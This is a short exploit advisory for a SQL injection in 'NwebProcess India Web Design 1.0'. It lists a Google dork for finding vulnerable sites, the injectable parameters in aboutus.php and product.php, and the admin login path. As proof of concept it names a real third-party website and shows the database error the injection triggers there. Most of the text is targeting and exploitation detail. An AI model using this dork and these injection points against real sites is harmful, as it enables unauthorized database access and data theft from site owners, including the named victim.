########################################################## # Exploit Title : NwebProcess India Web Design 1.0 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Date : 30/12/2018 # Vendor Homepage : nwebprocess.com # Tested On : Windows # Exploit Risk : Medium # Version Information : 1.0 # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050291 ########################################################## Copyright A(c) 2013 Powered by NWebProcess India SQL Injection Vulnerability ########################################################## # Google Dork : intext:''Copyright A(c) 2013 Powered by NWebProcess'' # Exploit : /aboutus.php?id=[SQL Injection] # Exploit : /product.php?cat_id=[SQL Injection] # Admin Control Panel Login Area Path => /admin/ ########################################################## # Example Site => advanceagencies.in/aboutus.php?id=1%27 => [ Proof of Concept for SQL Injection ] => archive.is/YzvPU # SQL/DB Error appear on the page : An Internal Error has Occured. Please report following error to the webmaster. select * from tbl_content where id='1'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1' ########################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ##########################################################